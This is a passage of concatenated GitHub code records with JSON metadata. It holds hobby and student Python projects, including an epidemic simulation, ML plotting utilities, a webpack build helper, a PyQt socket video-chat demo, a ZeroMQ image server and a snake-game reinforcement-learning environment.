infection_init_pop(dinitpersinfect):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n dinitpersinfect : la densite initiale de cellule infecte\r\n\r\n Returns\r\n -------\r\n Cette fonction imrpime le premier jour, puis prend la densite initiale de cellule infecte et les infecte aleatoirement sur la grille et puis retourne cette nouvelle grille G avec les cellule maintenant infectes\r\n \"\"\"\r\n print(\"\\n Jour: 1\")\r\n for k in range(dinitpersinfect):\r\n G[random.randint(1, x)][random.randint(1, y)][\"etat\"] = \"infecte\"\r\n return G","repo_name":"Lucas-Signes/Projet-Propagation-de-Epidemie","sub_path":"creation_config.py","file_name":"creation_config.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41152205971","text":"import random\nfrom collections import deque\n\nimport numpy as np\n\nfrom utils import DataSchema\n\n\nclass Replay:\n def __init__(self, max_size: int, schema: DataSchema):\n self._size = 0\n self._next_idx = 0\n self._max_size = max_size\n self._storage = [deque([], maxlen=max_size) for _ in schema.names]\n self.schema = schema\n\n def push(self, *data):\n assert len(data) == len(self._storage)\n for v, arr in zip(data, self._storage):\n arr.append(v)\n\n def sample(self, n):\n idxes = random.choices(range(len(self._storage[0])), k=n)\n\n ret = [\n np.array([arr[i] for i in idxes]).reshape((n, *shape)).astype(dtype)\n for arr, shape, dtype\n in zip(self._storage, self.schema.shapes, self.schema.dtypes)\n ]\n\n return ret\n","repo_name":"wwiiiii/deepest-season-7-challenge-rl","sub_path":"replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"86"} +{"seq_id":"7128157979","text":"import os\nimport json\nimport subprocess\n\nclass WebpackManager(object):\n def __init__(self,\n webpack_config_template,\n public_path,\n stats_file = \"webpack-stats.json\"):\n self._webpack_config_template = webpack_config_template\n self._public_path = public_path\n self._outfile = \"generated-webpack-config.out\"\n self._stats_file = stats_file\n\n def current_bundle(self):\n \"\"\"\n Returns the name of the current javascript bundle\n \"\"\"\n stats = self._webpack_stats()\n return stats['chunks']['main'][0]['name']\n\n def _generate_webpack_config(self):\n \"\"\"\n Generate a webpack config from a template, replacing variables as necessary\n - {public_path}: Replaced with the given public path for static assests (CDN etc)\n \"\"\"\n config = \"\"\n with open(self._webpack_config_template, 'r') as fp:\n config = fp.read()\n \n replace = {\"public_path\": self._public_path}\n for k in replace:\n config = config.replace(\"{%s}\" % k, replace[k])\n \n with open(self._outfile, 'w') as fp:\n return fp.write(config)\n\n def run_webpack(self):\n \"\"\"\n Run webpack using the given config file\n \"\"\"\n self._generate_webpack_config()\n res = subprocess.Popen(\"webpack --config %s\" % self._outfile,\n shell=True,\n stdout=subprocess.PIPE).stdout.read().decode('utf-8')\n subprocess.Popen(\"rm %s\" % self._outfile,\n shell=True,\n stdout=subprocess.PIPE).stdout.read().decode('utf-8') \n return res\n\n def _webpack_stats(self):\n \"\"\"\n Gather information about most recent webpack run\n \"\"\"\n with open(self._stats_file, 'r') as fp:\n webpack_stats = json.load(fp)\n if webpack_stats['status'] != 'done':\n raise Exception('Webpack did not successfully complete')\n return webpack_stats\n \n","repo_name":"mmcdermo/BlueLeader","sub_path":"blueleader/webpack.py","file_name":"webpack.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6755827008","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 18 11:53:22 2021\r\n\r\n@author: Geeta\r\n\"\"\"\r\n\r\nimport pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n#clock = pygame.time.Clock()\r\n \r\nimport time\r\npygame.init()\r\npygame.display.init()\r\n\r\ndef events():\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\nscreen = pygame.display.set_mode((600,600))\r\npygame.display.set_caption(\"Blitting an image over another image\")\r\nbgd = pygame.image.load(\"plainorangebackground.png\").convert()\r\nimage1 = pygame.image.load(\"player1.png\").convert()\r\n\r\n\r\nx = 0\r\ny = 0\r\nwhile True:\r\n screen.blit(bgd,(0,0))\r\n screen.blit(image1,(x,y))\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == K_LEFT:\r\n x -= 50\r\n screen.blit(bgd,(0,0)) \r\n screen.blit(image1,(x,y))\r\n pygame.display.update()\r\n time.sleep(0.5)\r\n if event.key == K_RIGHT:\r\n x = x+50\r\n screen.blit(bgd,(0,0)) \r\n screen.blit(image1,(x,y))\r\n pygame.display.update()\r\n time.sleep(0.5)\r\n if event.key == K_UP:\r\n y-= 50\r\n screen.blit(bgd,(0,0))\r\n screen.blit(image1,(x,y))\r\n pygame.display.update()\r\n time.sleep(0.5)\r\n if event.key == K_DOWN:\r\n y+= 50\r\n screen.blit(bgd,(0,0))\r\n screen.blit(image1,(x,y))\r\n pygame.display.update()\r\n time.sleep(0.5)\r\n events()\r\n \r\n \r\n","repo_name":"gv2008/TechClub-gv","sub_path":"rover2.py","file_name":"rover2.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"32999348703","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import precision_recall_curve, roc_auc_score, roc_curve, classification_report\n\n\ndef confusion_matrix_and_classification_report(cross_val):\n conf_mat = cross_val[1]\n y_pred = cross_val[2]\n y_test = cross_val[3]\n\n # print classification report and confusion matrix\n print(conf_mat)\n\n plt.imshow(conf_mat, interpolation='nearest', cmap=plt.cm.Blues)\n plt.title(\"Confusion matrix\")\n plt.colorbar()\n plt.xticks([0, 1], ['Expected: 0', 'Expected: 1'])\n plt.yticks([0, 1], ['Predicted: 0', 'Predicted: 1'])\n plt.show()\n\n print(classification_report(y_test, y_pred))\n\n\ndef precision_and_recall(cross_val):\n precision_scores = cross_val[7]\n recall_scores = cross_val[8]\n\n avg_precision_0 = np.mean([score[0] for score in precision_scores])\n avg_precision_1 = np.mean([score[1] for score in precision_scores])\n avg_recall_0 = np.mean([score[0] for score in recall_scores])\n avg_recall_1 = np.mean([score[1] for score in recall_scores])\n\n print('AVG_PRECISION_0: %.2f' % avg_precision_0)\n print('AVG_PRECISION_1: %.2f' % avg_precision_1)\n print('AVG_RECALL_0: %.2f' % avg_recall_0)\n print('AVG_RECALL_1: %.2f' % avg_recall_1)\n\n return avg_precision_0, avg_recall_0, avg_precision_1, avg_recall_1\n\n\ndef roc_curve_plot(cross_val):\n y_test = cross_val[3]\n y_pred = cross_val[2]\n\n # ROC curve\n fpr, tpr, thresholds = roc_curve(y_pred, y_test)\n auc = roc_auc_score(y_pred, y_test)\n plt.plot(fpr, tpr, label=f'LR (AUC = {auc:.2f})')\n plt.plot([0, 1], [0, 1], 'k--') # Reference line\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC curve')\n plt.legend()\n plt.show()\n\n\ndef mean_scores(classifiers, cross_val):\n acc_scores = cross_val[0]\n mean_scores = np.mean(acc_scores, axis=1)\n std_scores = np.std(acc_scores, axis=1)\n\n for clf_id, clf_name in enumerate(classifiers):\n print(list(classifiers.keys())[clf_id] + \":\",\n \"Mean score: %.3f\" % mean_scores[clf_id],\n \"\\tStd: %.3f\" % std_scores[clf_id])\n\n\ndef feature_selection_charts(lr):\n selected_features = np.load('selected_features.npy')\n print(selected_features)\n\n # feature importance\n feature_weights = lr.weights\n feature_importance = np.abs(feature_weights)\n features = ['Pclass', 'Parch', 'Fare', 'Sex_female', 'Sex_male', 'Ticket_110152', 'Ticket_113760', 'Ticket_13502',\n 'Ticket_24160', 'Ticket_2666', 'Ticket_29106', 'Ticket_347742', 'Ticket_CA. 2343', 'Ticket_PC 17572',\n 'Ticket_PC 17755', 'Cabin_B96 B98', 'Cabin_E101', 'Cabin_F33', 'Embarked_C', 'Embarked_S']\n importance = [0.016031662428189018, 0.0037305908758575074, 0.01203896354791156, 0.02567313154935162,\n 0.02567313154935162, 0.003468582182947117, 0.003987848670741845, 0.0034700750345102696,\n 0.0034445361913083387, 0.004016649766817327, 0.003540189598150869, 0.003530647252465814,\n 0.0033744402951988006, 0.0034955961743442206, 0.003418423154435658, 0.003987848670741845,\n 0.003491489266030324, 0.0034955100005501258, 0.007862900947430819, 0.007280306582351379]\n # bar chart\n plt.figure(figsize=(10, 6))\n plt.bar(features, importance)\n plt.xticks(rotation=90)\n plt.xlabel('Feature')\n plt.ylabel('Importance')\n plt.title('Feature Importance')\n plt.tight_layout()\n plt.show()\n\n # pie chart with color map\n colors = plt.cm.tab20b(range(len(features)))\n plt.figure(figsize=(8, 8))\n plt.pie(importance, labels=features, autopct='%1.1f%%', startangle=90, colors=colors)\n plt.axis('equal')\n plt.title('Ważność cech')\n plt.show()\n\n\ndef histograms(data):\n # Pclass histogram\n grouped_data = data.groupby(['Pclass', 'Survived']).size().unstack()\n fig, ax = plt.subplots()\n bar_width = 0.4\n index = np.arange(len(grouped_data.index))\n rects1 = ax.bar(index, grouped_data[0], bar_width, label=\"Didn't survive\")\n rects2 = ax.bar(index + bar_width, grouped_data[1], bar_width, label='Survived')\n ax.set_xticks(index + bar_width / 2)\n ax.set_xticklabels(grouped_data.index)\n ax.set_ylabel('Number of people')\n ax.set_title('Dependence of survival on passenger class (Pclass)')\n ax.legend()\n plt.show()\n\n # Sex histogram\n grouped_data = data.groupby(['Sex', 'Survived']).size().unstack()\n fig, ax = plt.subplots()\n bar_width = 0.4\n index = np.arange(len(grouped_data.index))\n rects1 = ax.bar(index, grouped_data[0], bar_width, label=\"Didn't survive\")\n rects2 = ax.bar(index + bar_width, grouped_data[1], bar_width, label='Survived')\n ax.set_xticks(index + bar_width / 2)\n ax.set_xticklabels(grouped_data.index)\n ax.set_ylabel('Number of people')\n ax.set_title('Dependence of survival on passenger sex')\n ax.legend()\n plt.show()\n\n\ndef iter_experiment_results():\n n_iters_experiment = np.load('number_of_iterations_results.npz')\n\n # print number of iters experiment results\n n_iters_keys = n_iters_experiment\n for key in n_iters_keys:\n print(f\"Results for {key}: %.3f\" % n_iters_experiment[key])\n\n\ndef scatter(cross_val):\n x_test = cross_val[4]\n y_pred = cross_val[2]\n\n plt.figure(figsize=(6, 6))\n plt.scatter(x_test[:, 0], x_test[:, 1], c=y_pred, cmap='viridis')\n plt.title(f'Scatter Plot')\n plt.xlabel('Feature 1')\n plt.ylabel('Surivived')\n plt.show()\n\n\ndef feature_reduction_and_scatter_plot(cross_val, lr, resolution=0.02):\n y_pred = cross_val[2]\n y_test = cross_val[3]\n x_train = cross_val[5]\n y = cross_val[6]\n x_test = cross_val[4]\n\n # apply dimensionality reduction using t-SNE\n tsne = TSNE(n_components=2, random_state=42)\n X_tsne = tsne.fit_transform(x_train)\n\n # set up marker generator and color map\n markers = ('s', 'o')\n colors = ('blue', 'red')\n\n plt.figure(figsize=(8, 6))\n for idx, label in enumerate([y_test, y_pred]):\n plt.scatter(X_tsne[:len(label), 0], X_tsne[:len(label), 1], c=label, cmap=ListedColormap(colors[idx]),\n marker=markers[idx], alpha=0.6)\n\n plt.xlabel('Dimension 1')\n plt.ylabel('Dimension 2')\n plt.legend(['True', 'Predicted'])\n plt.show()\n\n pca = PCA(n_components=2)\n # fit and transform data\n X = pca.fit_transform(x_train)\n X_test_pca = pca.transform(x_test)\n lr.fit(X, y)\n\n # setup marker generator and color map\n markers = ('s', 'x', 'o', '^', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n\n # plot class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0],\n y=X[y == cl, 1],\n alpha=0.6,\n c=[cmap(idx)],\n edgecolor='black',\n marker=markers[idx],\n label=cl) # plot decision regions for training set\n\n plt.xlabel('PC 1')\n plt.ylabel('PC 2')\n plt.legend(loc='lower left')\n plt.show()\n\n # Dimension reduction using PCA\n # pca = PCA(n_components=2)\n # X_reduced = pca.fit_transform(x_test)\n #\n # # Standardize the reduced features for better visualization\n # scaler = StandardScaler()\n # X_reduced = scaler.fit_transform(X_reduced)\n #\n # # Set up marker generator and color map\n # markers = ('s', 'x', 'o', '^', 'v')\n # colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n # cmap = ListedColormap(colors[:len(np.unique(y_test))])\n # print(X_reduced)\n\n # Plot scatter plot\n # plt.scatter(X_reduced[y_test == 0, 0], X_reduced[y_test == 0, 1], c='red', marker='o', label='Actual Labels 0')\n # plt.scatter(X_reduced[y_test == 1, 0], X_reduced[y_test == 1, 1], c='red', marker='o', label='Actual Labels 1')\n # plt.scatter(X_reduced[y_pred == 0, 0], X_reduced[y_pred == 0, 1], c='blue', marker='s', label='Predicted Labels 0')\n # plt.scatter(X_reduced[y_pred == 1, 0], X_reduced[y_pred == 1, 1], c='blue', marker='s', label='Predicted Labels 1')\n #\n # plt.xlabel('PCA1')\n # plt.ylabel('PCA2')\n # plt.legend(loc='best')\n # plt.title('Scatter Plot of Reduced Features')\n #\n # plt.show()\n # y_pred = cross_val[2]\n # y_test = cross_val[3]\n #\n #\n # # setup marker generator and color m\n # markers = ('s', 'x', 'o', '^', 'v')\n # colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n # cmap = ListedColormap(colors[:len(np.unique(y_pred))])\n #\n # # dimension reduction using PCA\n # pca = PCA(n_components=2)\n # X_reduced = pca.fit_transform(X_selected)\n\n # # feature weights for pc1\n # feature_weights_pc1 = pca.components_[0]\n #\n # # feature weights for pc2\n # feature_weights_pc2 = pca.components_[1]\n #\n # # pc1 feature importace\n # top_features_pc1 = np.argsort(np.abs(feature_weights_pc1))[::-1][:5]\n # print(\"Top features for PC1:\")\n # for feature_idx in top_features_pc1:\n # print(col_names_encoded[feature_idx])\n #\n # # pc2 feature importace\n # top_features_pc2 = np.argsort(np.abs(feature_weights_pc2))[::-1][:5]\n # print(\"Top features for PC2:\")\n # for feature_idx in top_features_pc2:\n # print(col_names_encoded[feature_idx])\n\n # plt.scatter(X_reduced[:, 0], X_reduced[:, 1])\n # plt.xlabel('PC1')\n # plt.ylabel('PC2')\n # plt.title('Scatter Plot after PCA')\n # plt.show()\n","repo_name":"wikaax/logistic-regression","sub_path":"msiProjekt/methods/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34456104696","text":"# -*- coding:utf-8 -*-\n# 作 者:Ailian\n# 开发时间:2022/9/14 13:48\n\n\n\"\"\"\n- 语法结构\n for 循环变量 in 遍历对象:\n 语句块1\n else:\n 语句块2\n- else语句只在循环正常结束后才执行\n- 通常与break和continue语句一起使用\n\"\"\"\n# 计算1-10之间的累加和\ns = 0\nfor i in range(1, 11):\n s += i # 相当于s = s+i\n\nprint(\"1-10之间的累加和为:\", s)\n","repo_name":"Ailian482/Python_Study","sub_path":"chap17-循环结构/demo4-循环结构的扩展模式.py","file_name":"demo4-循环结构的扩展模式.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15561542068","text":"from PyQt5 import QtWidgets, QtMultimedia, Qt, QtCore\nfrom threading import Thread\nimport requests\nimport socket\nfrom scipy import ndimage\nimport pickle\nimport json\nimport numpy as np\n\n\n# Works with DNS\nclass DNSConnecter:\n def __init__(self, dns_url=\"http://52.14.64.130:7000/dns\", port=20000):\n self.url = dns_url\n self.user_name = str()\n self.port = int() if port is None else port\n\n # Log in & log out\n def register_user(self, status: str) -> int:\n try:\n res = requests.get(self.url + f\"/register?alias={self.user_name}&status={status}&port={self.port}\")\n return res.status_code\n except Exception as e:\n print(e)\n return 500\n\n def list_users(self):\n res = requests.get(self.url + f\"/list\")\n data: dict = json.loads(res.content)\n return data\n\n # TODO\n def call(self, other_alias):\n res = requests.get(self.url + f\"/call?alias={self.user_name}&other_alias={other_alias}\")\n res = json.loads(res.content)\n return res\n\n def free(self) -> int:\n res = requests.get(self.url + f\"/free?alias={self.user_name}\")\n return res.status_code\n\n\nclass MThread(QtCore.QThread):\n def __init__(self, parent=None, func=None):\n super().__init__(parent)\n self.func: callable = func\n\n def run(self) -> None:\n if self.func is not None:\n self.func.__call__()\n\n\nclass QtypeDemo(QtWidgets.QApplication):\n def __init__(self, argv):\n super().__init__(argv)\n self.connecter = DNSConnecter()\n self.window = QtWidgets.QMainWindow()\n # Define all widgets\n self.graphics_view = QtWidgets.QGraphicsView(self.window)\n self.view_finder = Qt.QCameraViewfinder(self.window)\n self.chat_widget = QtWidgets.QListWidget(self.window)\n self.text_input = QtWidgets.QLineEdit(\"Input your text\", self.window)\n self.name_input = QtWidgets.QLineEdit(\"Input your name\", self.window)\n self.addr_input = QtWidgets.QLineEdit(\"192.168.1.\", self.window)\n self.exit_btn = QtWidgets.QPushButton(\"Exit demo\", self.window)\n self.send_msg_btn = QtWidgets.QPushButton(\"Send\", self.window)\n self.conn_btn = QtWidgets.QPushButton(\"Connect\", self.window)\n self.clear_btn = QtWidgets.QPushButton(\"Clear chat\", self.window)\n self.camera_btn = QtWidgets.QPushButton(\"Camera\", self.window)\n\n self.camera = QtMultimedia.QCamera(QtMultimedia.QCamera.availableDevices()[0])\n self.viewfinder_settings = Qt.QCameraViewfinderSettings()\n self.viewfinder_settings.setResolution(640, 480)\n self.video_probe = QtMultimedia.QVideoProbe()\n self.graphics_scene = QtWidgets.QGraphicsScene()\n self.camera.setViewfinderSettings(self.viewfinder_settings)\n self.camera.setViewfinder(self.view_finder)\n self.camera.setCaptureMode(Qt.QCamera.CaptureVideo)\n self.video_probe.setSource(self.camera)\n\n self.video_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n self.chat_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n self.frame_buffer = Qt.QBuffer()\n self.frame_buffer.open(Qt.QBuffer.ReadWrite)\n self.frame_buffer.bytesWritten.connect(self.redraw)\n self.video_th = MThread(func=self.recv_image) # Thread(target=self.recv_image)\n self.chat_th = MThread(func=self.recv_msg)\n self.video_th.start()\n self.chat_th.start()\n\n def connect_clients(self):\n # self.connecter.register_user('true')\n try:\n print(f\"Connecting to {self.addr_input.text()}:20000\")\n self.video_client.connect((self.addr_input.text(), 20000))\n self.chat_client.connect((self.addr_input.text(), 20004))\n # self.camera.start()\n except ConnectionError as e:\n print(e)\n\n @staticmethod\n def convert_to_rgb(data, pixel_format=19, width=640, height=480) -> np.ndarray:\n # https://maxsharabayko.blogspot.com/2016/01/fast-yuv-to-rgb-conversion-in-python-3.html\n def convertYUVtoRGB(yuv_planes: list, zoom_needed: bool):\n plane_y = yuv_planes[0]\n plane_u = yuv_planes[1]\n plane_v = yuv_planes[2]\n\n # upsample if YV12, alternativelly can perform upsampling with numpy.repeat()\n plane_u = ndimage.zoom(plane_u, 2, order=0) if zoom_needed else plane_u.repeat(2, axis=0).repeat(2, axis=1)\n plane_v = ndimage.zoom(plane_v, 2, order=0) if zoom_needed else plane_v.repeat(2, axis=0).repeat(2, axis=1)\n\n # reshape\n plane_y = plane_y.reshape((plane_y.shape[0], plane_y.shape[1], 1))\n plane_u = plane_u.reshape((plane_u.shape[0], plane_u.shape[1], 1))\n plane_v = plane_v.reshape((plane_v.shape[0], plane_v.shape[1], 1))\n\n # make YUV of shape [height, width, color_plane]\n yuv = np.concatenate((plane_y, plane_u, plane_v), axis=2)\n\n # according to ITU-R BT.709\n yuv[:, :, 0] = yuv[:, :, 0].clip(16, 235).astype(yuv.dtype) - 16\n yuv[:, :, 1:] = yuv[:, :, 1:].clip(16, 240).astype(yuv.dtype) - 128\n\n A = np.array([[1.164, 0.000, 1.793],\n [1.164, -0.213, -0.533],\n [1.164, 2.112, 0.000]])\n\n # our result\n return np.dot(yuv, A.T).clip(0, 255).astype('uint8')\n\n # Convert YV12 to RGB\n if pixel_format == Qt.QVideoFrame.Format_YV12:\n planes = list()\n # Y is data[:x*y]\n planes.append(np.asarray(data[:height * width], dtype=np.uint8).reshape((width, height)))\n # U is data[x*y:x*y*5/4]\n planes.append(np.asarray(data[height * width:int(height * width * 5 / 4)], dtype=np.uint8).reshape(\n (int(width / 2), int(height / 2))))\n # V is data[x*y*5/4:]\n planes.append(np.asarray(data[int(height * width * 5 / 4):], dtype=np.uint8).reshape(\n (int(width / 2), int(height / 2))))\n return convertYUVtoRGB(yuv_planes=planes, zoom_needed=True)\n\n # Convert YUYV to RGB\n elif pixel_format == Qt.QVideoFrame.Format_YUYV:\n planes = list()\n return convertYUVtoRGB(yuv_planes=planes, zoom_needed=False)\n\n def window_ui(self, window: QtWidgets.QMainWindow, window_size: tuple = (640, 540)):\n window.resize(*window_size)\n self.graphics_view.setStyleSheet(\"background-color: grey\")\n\n # Geometry\n self.graphics_view.setGeometry(\n int(0), int(0), int(window_size[0]*2/3), int(window_size[1]*7/9))\n self.view_finder.setGeometry(\n int(int(window_size[0]*2/3)), int(0), int(int(window_size[0]/3)), int(window_size[1]*2/9))\n self.chat_widget.setGeometry(\n int(window_size[0]*2/3), int(window_size[1]*2/9), int(window_size[0]/3), int(window_size[1]*5/9))\n self.exit_btn.setGeometry(\n 0, int(window_size[1]*7/9), int(window_size[0]*2/3), int(window_size[1]*1/9))\n\n self.text_input.setGeometry(\n int(window_size[0]*2/3), int(window_size[1]*7/9), int(window_size[0]*4/9), int(window_size[1]/9))\n self.send_msg_btn.setGeometry(\n int(window_size[0]*16/18), int(window_size[1] * 7 / 9), int(window_size[0]/9), int(window_size[1]/9))\n self.name_input.setGeometry(\n 0, int(window_size[1] * 8 / 9), int(window_size[0] / 6), int(window_size[1]/9))\n self.addr_input.setGeometry(\n int(window_size[0] / 6), int(window_size[1]*8/9), int(window_size[0]/2), int(window_size[1]/9))\n self.conn_btn.setGeometry(\n int(window_size[0] / 2), int(window_size[1]*8/9), int(window_size[0]/6), int(window_size[1]/9))\n self.clear_btn.setGeometry(\n int(window_size[0] * 2 / 3), int(window_size[1]*8/9), int(window_size[0] / 6), int(window_size[1]/9))\n self.camera_btn.setGeometry(\n int(window_size[0]*5/6), int(window_size[1] * 8 / 9), int(window_size[0] / 6), int(window_size[1] / 9))\n\n # Listeners\n self.conn_btn.clicked.connect(self.connect_clients)\n self.clear_btn.clicked.connect(lambda x: self.chat_widget.clear())\n self.camera_btn.clicked.connect(\n lambda x: self.camera.stop() if self.camera.status() == Qt.QCamera.StartingStatus else self.camera.start())\n self.send_msg_btn.clicked.connect(self.send_msg)\n self.exit_btn.clicked.connect(self.closeAllWindows)\n self.video_probe.videoFrameProbed.connect(self.send_image)\n self.graphics_scene.changed.connect(lambda x: self.graphics_view.setScene(self.graphics_scene))\n\n def send_image(self, frame):\n frame.map(QtMultimedia.QAbstractVideoBuffer.ReadOnly)\n bits_ptr = frame.bits()\n bits_ptr.setsize(frame.mappedBytes())\n bits_ptr = bytes(bits_ptr)\n # print(f\"Sending {len(bits_ptr)} bytes\")\n # Send it\n self.video_client.send(bits_ptr)\n\n def redraw(self):\n img = bytes(self.frame_buffer.data())\n img = self.convert_to_rgb([*img])\n self.graphics_scene.clear()\n self.graphics_scene.addPixmap(Qt.QPixmap.fromImage(\n Qt.QImage(img.data, img.shape[0], img.shape[1], img.shape[0] * img.shape[2], Qt.QImage.Format_Indexed8)))\n self.graphics_view.setScene(self.graphics_scene)\n\n def recv_image(self):\n self.video_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n self.video_server.bind(('', 20000))\n # print(self.video_server)\n self.video_server.listen()\n conn, addr = self.video_server.accept()\n while True:\n bits_ptr = bytes()\n while len(bits_ptr) < 640*720:\n bits_ptr += conn.recv(640*720)\n # print(len(bits_ptr), '-->', end=' ')\n self.frame_buffer.write(bits_ptr[:640*720])\n self.frame_buffer.seek(0)\n bits_ptr = bits_ptr[640*720:]\n # print(len(bits_ptr))\n\n def send_msg(self):\n msg = self.text_input.text()\n self.text_input.setText(\"\")\n self.chat_client.send(pickle.dumps(self.name_input.text()))\n self.chat_client.recv(1024)\n self.chat_client.send(pickle.dumps(msg))\n self.chat_client.recv(1024)\n self.chat_widget.addItem(\"[{}]: {}\".format(self.name_input.text(), msg))\n\n def recv_msg(self):\n self.chat_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n self.chat_server.bind(('', 20004))\n # print(self.chat_server)\n self.chat_server.listen()\n sock, addr = self.chat_server.accept()\n while True: # while True:\n name = pickle.loads(sock.recv(1024))\n sock.send(pickle.dumps(0))\n msg = pickle.loads(sock.recv(1024))\n sock.send(pickle.dumps(0))\n self.chat_widget.addItem(\"[{}]: {}\".format(name, msg))\n\n\nif __name__ == '__main__':\n app = QtypeDemo([])\n app.window_ui(app.window, (720, 540))\n app.window.show()\n exit(app.exec_())\n","repo_name":"LYttAGrt/Qtype","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":11128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73394822685","text":"\n#\n# CS361 Microservice: Server\n# Binds REP socket to tcp://*:5555\n#\n\nimport time\n# to install zeromq, run the command pip install pyzmq\nimport zmq\nimport base64\nimport random\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind(\"tcp://*:5555\")\nnumber_of_messages = 0\nnum = random.randint(1, 9)\nwith open(f\"{num}.jpg\", \"rb\") as img_file:\n my_string = base64.b64encode(img_file.read())\n print(\"copied\")\n# f = open(\"pic.bin\", \"wb\")\n# f.write(my_string)\n# f.close\n\n\nwhile number_of_messages < 1:\n # Wait for next request from client\n message = socket.recv()\n message = message.decode('utf8')\n print(f\"Received request: {message}\")\n\n # Do some 'work'\n time.sleep(1)\n\n # Send reply back to client\n socket.send(my_string)\n number_of_messages += 1","repo_name":"alyssafeutz/microservice_rough_draft","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"12055156598","text":"\r\n\r\nimport threading\r\nimport turtle\r\nfrom turtle import *\r\nfrom random import randrange\r\nimport random\r\nfrom freegames import square, vector\r\nimport numpy as np\r\nfrom pynput.keyboard import Key, Controller\r\nimport time\r\n\r\n\r\nclass SnakeGameEnvironment:\r\n\r\n\r\n MATRIX_SIZE = 620\r\n SCORE = 0\r\n\r\n def __init__(self, agent, numberOfObstacles= 25):\r\n self.keyboard = Controller()\r\n self.food = vector(0, -100)\r\n self.numberOfObstacles = numberOfObstacles\r\n self.obstacles = []\r\n self.snake = [vector(10, 20), vector(10, 10), vector(10, 0)]\r\n self.aim = vector(0, -10)\r\n self.direction = 'Down'\r\n self.agent = agent\r\n self.reward = 0\r\n self.spanObstacles()\r\n self.countscore = 0\r\n\r\n\r\n def getreward(self):\r\n return SnakeGameEnvironment.SCORE\r\n\r\n def spanObstacles(self):\r\n x, y = 0, 0\r\n for i in range(self.numberOfObstacles):\r\n while (True):\r\n x = randrange(-19, 19) * 10\r\n y = randrange(-19, 19) * 10\r\n if vector(x, y) not in self.snake:\r\n break\r\n self.obstacles.append(vector(x, y))\r\n\r\n def change(self, x, y, direction):\r\n \"To Change snake direction.\"\r\n if direction in self.getAvailableDirections():\r\n self.aim.x = x\r\n self.aim.y = y\r\n self.direction = direction\r\n\r\n def inside(self, head):\r\n \"Return True if head inside boundaries.\"\r\n return -200 < head.x < 200 and -200 < head.y < 200\r\n\r\n def getCurrentState(self):\r\n head = self.snake[-1].copy()\r\n return head.x, head.y\r\n\r\n i = 0\r\n\r\n def coordinateSystemConverter(self, coord, to=\"normal\"):\r\n x, y = coord\r\n mid = int(SnakeGameEnvironment.MATRIX_SIZE / 2)\r\n if to == \"normal\":\r\n x = mid + x\r\n y = mid - y\r\n else:\r\n x = mid - x\r\n y = mid + y\r\n return (x, y)\r\n\r\n def getReward(self, tempHead):\r\n if not self.inside(tempHead) or tempHead in self.snake:\r\n return -10\r\n if tempHead == self.food:\r\n\r\n return 50\r\n return -5\r\n\r\n def getNextRewardState(self):\r\n head = self.snake[-1].copy()\r\n\r\n head.move(self.aim)\r\n reward = []\r\n for direction in SnakeGameEnvironment.MOVABLE_DIRECTION:\r\n tempHead = self.transformMove(head, direction)\r\n reward.append(self.getReward(tempHead))\r\n return reward\r\n\r\n\r\n\r\n def move(self):\r\n \"Move snake forward by one block.\"\r\n head = self.snake[-1].copy()\r\n head.move(self.aim)\r\n\r\n\r\n if not self.inside(head) or head in self.snake or head in self.obstacles:\r\n square(head.x, head.y, 9, 'blue')\r\n update()\r\n bye()\r\n SnakeGameEnvironment.i = 0\r\n self.reward = -100\r\n SnakeGameEnvironment.SCORE = SnakeGameEnvironment.SCORE + 100\r\n action = self.agent.Act(self.getState(head, self.food), self.MOVABLE_DIRECTION,\r\n self.reward, True)\r\n return\r\n else:\r\n self.snake.append(head)\r\n\r\n if head == self.food:\r\n\r\n i = 1\r\n while (True):\r\n self.food.x = randrange(-20, 20) * 50\r\n self.food.y = randrange(-20, 20) * 50\r\n if self.food not in self.snake or self.food not in self.obstacles:\r\n break\r\n self.reward = 500\r\n SnakeGameEnvironment.i = 0\r\n else:\r\n self.snake.pop(0)\r\n self.reward = -10\r\n action = 